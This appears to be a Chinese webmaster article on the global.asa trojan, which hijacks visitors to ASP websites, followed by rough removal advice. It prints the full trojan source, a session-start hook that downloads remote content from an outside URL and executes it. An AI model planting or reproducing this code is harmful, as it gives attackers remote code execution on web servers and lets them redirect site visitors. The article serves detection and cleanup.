global.asa木马文件详解!
你的网站被挂马?被劫持了?可能对于一些有杀毒经验的站长来说是小问题,但对于普通人来说简直无法下手,或许说自己网站被挂马也发现不了。,最近有一种木马global.asa被黑客利用,从百度等搜索引擎访问网站的人都会被跳转到其他恶意网站上面.今天就给大家分析下怎么处置这种木马。
Global.asa 文件是一个可选的文件,它可包含可被ASP 应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的浏览器脚本都能在Global.asa 中使用。 Global.asa 中,我们可以告知application 和session 对象在启动和结束时做什么事情。完成此项任务的代码被放置在事件操作器中。
根 据上面的介绍大家应该大体了解了,其实这个木马就是属于ASP脚本木马木马。 因为这个文件可以调用很多程序,比如当客户访问你的网站的时候,可以调用跳转的命令。正因为 global.asa文件作用的特殊性,所以被黑客所利用,并制作成了网站木马。
首先我们来看下global.asa木马的代码:
1 sub Session_OnStart 2 3 On Error Resume Next 4 5 url="http://upload.chinaz.com//" 6 7 Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") 8 9 ObjXMLHTTP.Open "GET",url,False 10 11 ObjXMLHTTP.setRequestHeader "User-Agent",url 12 13 ObjXMLHTTP.send 14 15 GetHtml=ObjXMLHTTP.responseBody 16 17 Set ObjXMLHTTP=Nothing 18 19 set objStream = Server.CreateObject("Adodb.Stream") 20 21 objStream.Type = 1 22 23 objStream.Mode =3 24 25 objStream.Open 26 27 objStream.Write GetHtml 28 29 objStream.Position = 0 30 31 objStream.Type = 2 32 33 objStream.Charset = "gb2312" 34 35 GetHtml = objStream.ReadText 36 37 objStream.Close 38 39 set objStream=Nothing 40 41 if instr(GetHtml,"by*aming")>0 then 42 43 execute GetHtml 44 45 end if 46 47 end sub 48 49 sub Session_OnEnd 50 51 end sub*/
如果站长们发现自己的站点也有上述的症状,那恭喜你了。
怎么解决删除global.asa木马呢?
global.asa这个文件一般是在根目录下的,我自己尝试了N多遍,都没有删掉,在文件属性方面也做了修改,也始终无法删除这个顽固的木马。到最后用CHMOD命令删除了木马。如果自己不会删除的话你可以找自己的空间商让他们给你删除这个木马。
global.asa属于系统文件只能在cmd命令下强制删除。
到最后还要告诉大家一点是,为什么网站会被挂global.asa木马呢?其实根本的原因就是网站程序有漏洞,因为网站有漏洞才会被黑客利用并提权拿下了你网站的权限并上传制作了木马。只有把网站的安全做好了,你才不会被挂马的。